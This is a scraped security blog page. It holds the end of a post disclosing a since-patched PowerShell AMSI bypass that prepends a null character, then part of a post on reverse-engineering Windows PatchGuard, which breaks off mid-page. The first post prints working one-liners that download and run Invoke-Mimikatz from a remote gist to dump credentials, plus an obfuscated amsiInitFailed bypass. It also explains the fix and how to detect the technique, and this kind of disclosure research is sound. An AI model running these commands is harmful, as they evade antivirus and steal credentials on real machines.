<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxZwqRpHD94TSPbj8Tpkqlo4qWY63_gR_uL_2ndEHdF0k2QGv5ODHMTSUA3fWnm3g2m9w4E0_YP39HrEb-MWSriUQAHlstJzgvzcytW9ahk2oBwygFANZT6v6kuxTayxRL0b7GLQeJwE/s1600/ok.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="555" data-original-width="1430" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxZwqRpHD94TSPbj8Tpkqlo4qWY63_gR_uL_2ndEHdF0k2QGv5ODHMTSUA3fWnm3g2m9w4E0_YP39HrEb-MWSriUQAHlstJzgvzcytW9ahk2oBwygFANZT6v6kuxTayxRL0b7GLQeJwE/s640/ok.png" width="640" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="675" data-original-width="1600" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJgKrfhyphenhyphenjzg7qdukTevUb4K7wd20OjIJVVlqXPGJWAQBBmxLrLVCrQCDhY-DE8ql2D45M1jMtNumXoUU_xycb3xA9rIgBpMjp8R-sYzvZm23tf6c25TTNFRd55eCZtD_Fz-2BDfG-eiYk/s640/not.png" width="640" /></div>
<div>
<br /></div>
<h3>
Command Line Based Exploitation</h3>
<div>
With the above successful bypass, you might try to execute loaded Invoke-Mimikatz like below, but find it gets detected due to an appearance of "Invoke-Mimikatz" in the command line.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1');<span style="color: red;"> Invoke-Mimikatz -DumpCerts</span>"</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
A naive approach with Invoke-Expression could bypass process command line based detection but not AMSI based one, as "Invoke-Mimikatz" will still be visible to AMSI providers. Here is such an unsuccessful attempt.</div>
<div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); <span style="color: red;">IEX ('Invoke-'+'Mimikatz -DumpCerts')"</span></span></div>
<div>
----</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="509" data-original-width="1600" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdk8sTdJsU8WSUBGz7M1iVEGwFmYajMGsxs297j-Oev79lQ5btV6UZKNoaz3tOqUzHK9JFY8WvChsfE2vGM6sLYyX4lDdqMPLC6DUHMylltyei-xTFefX5_CelRI6vYyppct7qyF_UnWQ/s640/cred_fail.png" width="640" /></div>
<div>
<br /></div>
<div>
To bypass AMSI detection in this scenario, we can insert a null character into the command line with a bit of string manipulation.</div>
<div>
----</div>
<div>
<span style="font-size: x-small;"><span style="font-family: "verdana" , sans-serif;">powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-</span><span style="font-family: "verdana" , sans-serif;">BypassingMimikatz</span><span style="font-family: "verdana" , sans-serif;">.ps1'); IEX ('<span style="color: red;">if(0){{{0}}}' -f $(0 -as [char]) + </span>'Invoke-'+'Mimikatz -DumpCerts')"</span></span></div>
<div>
----</div>
<div>
<br /></div>
<div>
The highlighted part prepends a null character that never gets executed to the original command line. A resulted string will look like this.</div>
<div>
----</div>
<div>
<span style="font-size: x-small;"><span style="color: red; font-family: "verdana" , sans-serif;">if (0) {<NULL>}</span><span style="font-family: "verdana" , sans-serif;"> the rest of commands</span></span></div>
<div>
----</div>
<div>
<br /></div>
<div>
This can successfully prevent AMSI providers from receiving all of the contents and detecting "Invoke-Mimikatz."</div>
<div>
<img border="0" data-original-height="522" data-original-width="1600" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3oEw-8-bqnow8cljnt0HMGLeuzh22d7JtHSv_jP_qVHXO5ksGkT_GPQp3fOva3Kv66D4xnAhVLhMfW8k23o_jADUleE-XKt5mY0_n03HncnSZ-kZUQKswxKNgxbg8V0hlqaGw3TqmzQQ/s640/bypass.png" width="640" /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="1166" data-original-width="1600" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpp86yg5YbCC4RP4nOXq2YJtwi0_ELtRS-eWuoHjzTPZcNGzLZMfxsEfgwHiDOjoQUrtXfoyBmS41THPeX_PRK2KOMgp_eiNI_hl8WUqjafGUBQpTElSi2xVLySkZmNWedRp4SDh3VDgM/s640/mimi.png" width="640" /></div>
<div>
<br /></div>
<h3>
Summary of Exploitation</h3>
<div>
For file contents, insert "#<NULL>" at the beginning of the file, and any places where additional scans with AMSI occur. To identify the latter places, some try-and-error will be needed. Using a debugger and logging invocation of AmsiScanString with the below command will be helpful.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">bp amsi!AmsiScanString "du @rdx;g"</span></div>
<div>
----</div>
<div>
<div>
<br /></div>
<div>
For command line contents, wrap them into Invoke-Expression and prepend "'if(0){{{0}}}' -f $(0 -as [char]) +". Here is another step-by-step example to bypass detection on "AmsiUtils" and "amsiInitFailed" in the below contents:</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
1. Wrap the original contents with Invoke-Expression.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;"><span style="color: red;">IEX</span> <span style="color: red;">('</span>[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)<span style="color: red;">')</span></span></div>
<div>
----</div>
<div>
<br /></div>
<div>
2. Prepend the null character to bypass AMSI based detection.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">IEX (<span style="color: red;">'if(0){{{0}}}' -f $(0 -as [char]) +</span> '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
3. Make any modification sufficient to bypass command line based detection.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.<span style="color: red;">Amsi'+'Utils</span>").GetField("<span style="color: red;">amsi'+'InitFailed</span>","NonPublic,Static").SetValue($null,$true)')</span></div>
</div>
<div>
----</div>
<div>
<br /></div>
<div>
It is worth noting that this exploitation is usable even on the Constrained Language Mode and does not trigger any event logs, unlike the most of AMSI bypass techniques which use reflection.</div>
<div>
<br /></div>
<h2>
Fix and Recommendation</h2>
<div>
The fix Microsoft made was to use AmsiScanBuffer instead of AmsiScanString in System.Management.Automation.dll. As shown below, this function accepts arbitrary byte sequence for contents.</div>
<div>
<div>
----</div>
<div>
<pre style="overflow: auto; padding: 5px; white-space: pre-wrap; word-break: break-word; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">HRESULT WINAPI AmsiScanBuffer(
_In_ HAMSICONTEXT amsiContext,
_In_ PVOID buffer, <span style="color: #6aa84f;">// Not terminated at the null character</span>
_In_ ULONG length,
_In_ LPCWSTR contentName,
_In_opt_ HAMSISESSION session,
_Out_ AMSI_RESULT *result
);</span></pre>
</div>
<div>
----</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLJzvmbW8XRMIqQwvkA1EBZh_2Th_TbPjq0LUHOMwG6NmCcfhjaCWcKJ6pOMHSDQI4fr3JsAMuHK1GwjOCRZ9RhujLLddjCZ9dTxowcODyfoLxRmJTHs1JQAkG7r7Q8sw5G1v8NR8n2E/s1600/patch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="397" data-original-width="1600" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLJzvmbW8XRMIqQwvkA1EBZh_2Th_TbPjq0LUHOMwG6NmCcfhjaCWcKJ6pOMHSDQI4fr3JsAMuHK1GwjOCRZ9RhujLLddjCZ9dTxowcODyfoLxRmJTHs1JQAkG7r7Q8sw5G1v8NR8n2E/s640/patch.png" width="640" /></a></div>
<div>
<br /></div>
<div>
This way, AMSI providers can receive and scan entire contents even if a null character appears in the middle.</div>
<div>
<br /></div>
<div>
In theory, no action other than applying the patch should be required. However, software vendors using AMSI to scan PowerShell contents should review whether it can handle null characters properly should they appear.<br />
<br />
Additionally, security researchers and users of security software can test if their AMSI providers are vulnerable to the bypass technique and ask vendors to address issues if needed. Also, it might be worth monitoring any appearance of a null character in PowerShell contents to detect attempts to exploit this issue.</div>
<div>
<br /></div>
<div>
As for other script engines, PowerShell Core is also affected but does not have a patch as of this writing yet. Windows Script Host is not affected as its interpreter stops reading script contents at the first null character, unlike PowerShell.</div>
<div>
<br /></div>
<h2>
Acknowledgement</h2>
<div>
Kudos to Alex Ionescu (@aionescu) for helping me report this issue, and Microsoft for fixing it.</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com3tag:blogger.com,1999:blog-2937860723034111347.post-30514418043697917222015-10-15T22:09:00.000-07:002015-10-16T21:36:21.960-07:00Some Tips to Analyze PatchGuard<div class="separator" style="clear: both; text-align: left;">
I published a new tool called <a href="https://github.com/tandasat/meow" target="_blank">meow</a> that disables PatchGuard on Windows 8.1 on-the-fly. Though qertmeow has some interesting technical details I could explain such as support of ARM (Windows RT) and detection of the end of a function for installing an epilogue hook, on this entry, I am going to explain some techniques that help researchers analyze PatchGuard on your own rather than how this specific exploitation works. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Those techniques are worthwhile to share because, you have to be able to analyze it if you hope to do something with PatchGuard as it is a moving target, and meow is not going to work forever due to updates of implementation of PatchGuard, or meow may not be perfect even at the time of publication of this article.</div>
<br />
<h3>
Summary</h3>
As your regular reverse engineering work, you can analyze PatchGuard in both static and dynamic means, but there are some hurdles specific to PatchGuard analysis on both sides, for example:<br />
<br />
<ul>
<li>PatchGuard related functions do not have descriptive names or do not have names at all unlike other functions in the kernel</li>
<li>Most of function calls in PatchGuard functions are indirect calls like C++ code</li>
<li>Kernel debugging is not an option in some situations</li>
<li>Code is copied into random locations and stored in an encrypted form, and you cannot easily spot where to monitor at the run-time</li>
</ul>
<br />
Those are significant difficulties you face at the initial stage of analysis, but also ones you can easily overcome if you know some tricks I describe here. The tricks are as follows:<br />
<br />
<ul>
<li>Identifying PatchGuard functions</li>
<ul>
<li>Locating an initialization function and checking cross-references</li>
<li>Naming functions in a consistent manner</li>
<li>Checking the existence of SEH</li>
</ul>
<li>Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard context</li>
<ul>
<li>Dissecting bug check parameters</li>
<li>Applying the format of the context to IDA</li>
</ul>
<li>Discovering Threads Executing PatchGuard Code</li>
<ul>
<li>Finding system threads on memory </li>
</ul>
</ul>
<br />
let us through them one by one.<br />
<br />
<h3>
Identifying PatchGuard functions</h3>
Firstly, you can easily find an initialization function of PatchGuard by sorting a function list by length. The largest function in the ntoskrnl.exe is the initialization function executed at the time of system initialization and sets up a large structure so called the PatchGuard context(s) on non-pagable memory (I am going to describe the structure of the context later). I call this function as Pg_xInitializePatchGuard() in this article.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVTlAlwQtFdbZ6WlFdWehrD_QwmuV8cU0zSbqoYMROxVveSigfQiOgC-IVeok0th5g61DYBeWIka6ThG25rkB5jErkJaVwKuS3Srv6-ARptM6t9dXy8gOH2puov1NKfy6vzorKQxwy2YM/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVTlAlwQtFdbZ6WlFdWehrD_QwmuV8cU0zSbqoYMROxVveSigfQiOgC-IVeok0th5g61DYBeWIka6ThG25rkB5jErkJaVwKuS3Srv6-ARptM6t9dXy8gOH2puov1NKfy6vzorKQxwy2YM/s1600/1.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: The largest functions on x64 </td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCAqKhOoGMKlI0MFBwgtxGiom4HRjF-dARcU4uqHuHvnQMHFItaoXpd6-pd9iZxw6yjczfgBdLCyCbwtZumMs0vhiqJ1Db0zjuFTNUq3d-O9ac16USpqgf9ei7ZKCbmzfeWk_fnCwVg0I/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCAqKhOoGMKlI0MFBwgtxGiom4HRjF-dARcU4uqHuHvnQMHFItaoXpd6-pd9iZxw6yjczfgBdLCyCbwtZumMs0vhiqJ1Db0zjuFTNUq3d-O9ac16USpqgf9ei7ZKCbmzfeWk_fnCwVg0I/s1600/1.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 2: The largest functions on ARM</td></tr>
</tbody></table>
<br />
Secondly, you can identify other PatchGuard related functions with cross-referencing function calls. If a function is referenced from only other PatchGuard related functions, it is safe to assume that the function is PatchGuard dedicated and needs to be analyzed. As an example, let us take a look at a caller of Pg_xInitializePatchGuard(), KiFilterFiberContext(). You see that this function is referenced from Pg_xInitializePatchGuard() and another unnamed function sub_1407339C3() which is not called by anywhere. At this stage, it is safe to say that KiFilterFiberContext() and sub_1407339C3() are only used for PatchGuard.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NxUlKVh1sBBtIVlLPSRtAYlO9dms2QTs_X0trVY7e1tqMh5_qoVSeVEi8KsjV7-dOrqi3rW978dc3HuWmKSg2a2dXPVTsOdReVq-sc-JoCwziEbtFv0_u_WKeSIu8or9TGdQ7V6LWqk/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NxUlKVh1sBBtIVlLPSRtAYlO9dms2QTs_X0trVY7e1tqMh5_qoVSeVEi8KsjV7-dOrqi3rW978dc3HuWmKSg2a2dXPVTsOdReVq-sc-JoCwziEbtFv0_u_WKeSIu8or9TGdQ7V6LWqk/s1600/2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 3: Callers of Pg_xInitializePatchGuard()</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBPFKO-ntnPjxNQdVsbaVMigh6KD9KSqUwhaVlx8ZobOq9czY5eVol_h_HkOWO7NRqTyXRu0y_9NLfmuIsQxRKM4Ccg1Yk9ziAPV5Eli7Mu5P7GxW_DQ17B1Le2uGJ932Gbm1JcEOGs14/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBPFKO-ntnPjxNQdVsbaVMigh6KD9KSqUwhaVlx8ZobOq9czY5eVol_h_HkOWO7NRqTyXRu0y_9NLfmuIsQxRKM4Ccg1Yk9ziAPV5Eli7Mu5P7GxW_DQ17B1Le2uGJ932Gbm1JcEOGs14/s1600/3.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 4: Callers of sub_1407339C3()</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
For ease of analysis with IDA, it is worth naming functions in a consistent manner since a number of functions to be analyzed is going to be large. I usually name PatchGuard functions with prefixes Pg_ or Pg_x for ones with symbols names and for ones without symbol names, respectively. In this case, I name KiFilterFiberContext() as Pg_KiFilterFiberContext(), and sub_1407339C3() as Pg_xKiFilterFiberContextCaller().<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwJdp33CSyA1irYfYC25ywC2EFk-IvF6ciWtBwlYtcfTEmVZa-iSmycL6HyvfVpmevmLZ-4laaoXWkDIE18jqgow642lhRovS9t_f-S-6f-lfrHCu5gZ2P-wOO38iv9Wozq8mO3iEAp30/s1600/4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwJdp33CSyA1irYfYC25ywC2EFk-IvF6ciWtBwlYtcfTEmVZa-iSmycL6HyvfVpmevmLZ-4laaoXWkDIE18jqgow642lhRovS9t_f-S-6f-lfrHCu5gZ2P-wOO38iv9Wozq8mO3iEAp30/s1600/4.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 5: Filtering functions with the prefix</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
You may also want to use <a href="https://github.com/tandasat/scripts_for_RE/blob/master/parse_x64_SEH.py" target="_blank">parse_x64_SEH.py</a> to discover code flow using SEH. With this script, you find that Pg_xKiFilterFiberContextCaller() is an __except expression and corresponding __try is in KeInitAmd64SpecificState(). By now, you may rename Pg_xKiFilterFiberContextCaller() as Pg_xKeInitAmd64SpecificStateExceptionHandler() and KeInitAmd64SpecificState() as Pg_KeInitAmd64SpecificState().<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCiI5NZkIwL664zstJfCNGS4yqY_pPvNbkfaCuP2dR_kQtcZ7UCClLFItR9l9Luyq5SPvX698K9HMsgC3AWGAiNNDciCXfh4jIiLskuh8z_-0Cl4QzTxB3ZTCWtCAf0sbC6iuJkiIL06Y/s1600/5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCiI5NZkIwL664zstJfCNGS4yqY_pPvNbkfaCuP2dR_kQtcZ7UCClLFItR9l9Luyq5SPvX698K9HMsgC3AWGAiNNDciCXfh4jIiLskuh8z_-0Cl4QzTxB3ZTCWtCAf0sbC6iuJkiIL06Y/s1600/5.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 6: Reflected SEH information</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdOh5KGtmy7BGxBT4QqAkF6yL-dOuIKZGhXaO3RpTgi8N7N0HL3ZuZ_ndgL_gqY6hk33_e6_4DWGpMKqzPfeRM9POcyTwSMuFm10inee95E5uYFlv-lgkWsrcQJtJn0yUi_crVW-Mvrys/s1600/6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdOh5KGtmy7BGxBT4QqAkF6yL-dOuIKZGhXaO3RpTgi8N7N0HL3ZuZ_ndgL_gqY6hk33_e6_4DWGpMKqzPfeRM9POcyTwSMuFm10inee95E5uYFlv-lgkWsrcQJtJn0yUi_crVW-Mvrys/s1600/6.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 7: Where the corresponding __try is</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Similarly, you can repeat the same process against all functions and global variables referenced from each Pg_*() function using the Proximity browser of IDA. This gives you a fairly comprehensive list of Pg_ functions, which can be discouraging enough to most of casual reverse engineers ;)<br />
<br />
<h3>
Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard Context</h3>
As soon as you start to read Pg_*() functions, you discover that there are countless of indirect calls with specific registers. Those are accesses to the PatchGuard context, and it is essential to know what are stored and how they are used to understand the internals of PatchGuard. <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYUl0QgLXqBZwUNGZTcutD1FDfvEO2eJ0z4Ztp6Potq5Gz9Kb-apAqoRDIfKplxLaWPfoAusKbY2sfJc1Gzy_gEaRUbqxogjlL0Ryws0kA7i5vnPuw8c-Eu-B1YFQU29iqfcrRcJCGAE/s1600/7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYUl0QgLXqBZwUNGZTcutD1FDfvEO2eJ0z4Ztp6Potq5Gz9Kb-apAqoRDIfKplxLaWPfoAusKbY2sfJc1Gzy_gEaRUbqxogjlL0Ryws0kA7i5vnPuw8c-Eu-B1YFQU29iqfcrRcJCGAE/s1600/7.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 8: References to the PatchGuard context</td></tr>
</tbody></table>
The most precise way to accomplish this is to read the initialization function (i.e., Pg_xInitializePatchGuard()) for function pointers and a main variation routine (i.e., Pg_FsRtlMdlReadCompleteDevEx()) for variables. Besides static analysis, it is also a wise idea to perform dynamic analysis to get a large view of it quickly, especially at the initial stage of analysis.<br />
<br />
There are some difficulties to perform effective run-time analysis, however.<br />
<br />
First of all, you do not know where to monitor at the beginning of analysis since most of core code are copied onto random memory locations and stored in an encoded form except for the time of execution. In addition to that, setting breakpoints or installing hooks onto the kernel causes bug check 0x109 unless you know how integrity check is carried out. Moreover, you may not able to attach a kernel debugger to the system running on some non-PC devices such as Windows RT and Windows Phone.<br />
<br />
It may sounds pretty bad to us, but a good news is that we can still uncover the contents of the PatchGuard context with analyzing crash dump. Specifically, you can interpret each 'reserved' bug check parameter in the following ways on x64:<br />
<br />
<ul>
<li>Arg1 - 0xA3A03F5891C8B4E8 = An address of the PatchGuard context</li>
<li>Arg2 - 0xB3B74BDEE4453415 = An address of a validation structure that detected corruption</li>
<li>Arg3 = An address of corrupted data (in most cases)<br /><br />NB: You can easily spot those magic values in Pg_FsRtlMdlReadCompleteDevEx() before a call to Pg_SdbpCheckDll() as well as code setting bug check parameters.</li>
</ul>
<br />
<br />
Let us take a look at an example on Windows 10. This is what you get on bug check 0x109:<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0: kd> !analyze -v</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************************************************************</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">* *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">* Bugcheck Analysis *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">* *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************************************************************</span><br />
<span style="font-size: x-small;"><span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">CRITICAL_STRUCTURE_CORRUPTION (109)</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arguments:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg1: <span style="color: red;">a3a01f597768b4f0</span>, Reserved</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg2: <span style="color: red;">b3b72bdfc9e65cc3</span>, Reserved</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg3: fffff80100af8074, Failure type dependent information</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg4: 0000000000000001, Type of corrupted region, can be</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span><br />
<div>
----<br />
Then, check the first parameter:<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> <span style="color: red;">? a3a01f597768b4f0 - 0xA3A03F5891C8B4E8</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Evaluate expression: -35180519620600 = <span style="color: red;">ffffe000`e5a00008</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> dps <span style="color: red;">ffffe000`e5a00008</span> l200</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a00008 70047266`b0b8a753</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span><br />
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000e0 00000000`00000000</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000e8 fffff801`00453b80 nt!ExAcquireResourceSharedLite</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000f0 fffff801`004537f0 nt!ExAcquireResourceExclusiveLite</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000f8 fffff801`00688930 nt!ExAllocatePoolWithTag</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a00100 fffff801`006896d0 nt!ExFreePool</span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a004b8 fffff801`00b850b0 nt!HandleTableListLock</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a004c0 ffffc001`0c614000 <span style="color: blue;">; </span></span><span style="color: blue;"><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nt!</span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ObpKernelHandleTable</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a004c8 fffff780`00000000 <span style="color: blue;">; </span></span><span style="color: blue;"><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nt!</span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">KiUserSharedData</span></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a004d0 ff73c402`76affdcd </span><span style="color: blue; font-family: 'Courier New', Courier, monospace; font-size: x-small;">; a copy of nt!KiWaitNever</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a004d8 fffff801`00b292c0 nt!SeProtectedMapping</span><span style="color: blue; font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span><br />
<div>
----</div>
<div>
In this example, ffffe000`e5a00008 is an address of the PatchGuard context starting with random-looking bytes followed by a bunch of function pointers and variables. Although you may not tell what some variables are at a glance, defining the PatchGuard structure in IDA with this result is fundamental to uncover how PatchGuard works.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijEgUETc51M9DgrvotLlLWmzswAfrC5Dra2rBHwpuVm8NjXyKDxGo9Z5CTr73NHrrfItBHC1zkTcnv4C06v7oJs2KhyphenhyphenIEs6DWR4wfgsQIfuz8sG2swk0JTvkZcQ8Qe08IgQ2KvJfzSVzw/s1600/8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijEgUETc51M9DgrvotLlLWmzswAfrC5Dra2rBHwpuVm8NjXyKDxGo9Z5CTr73NHrrfItBHC1zkTcnv4C06v7oJs2KhyphenhyphenIEs6DWR4wfgsQIfuz8sG2swk0JTvkZcQ8Qe08IgQ2KvJfzSVzw/s1600/8.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 9: Defining the structure in IDA</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
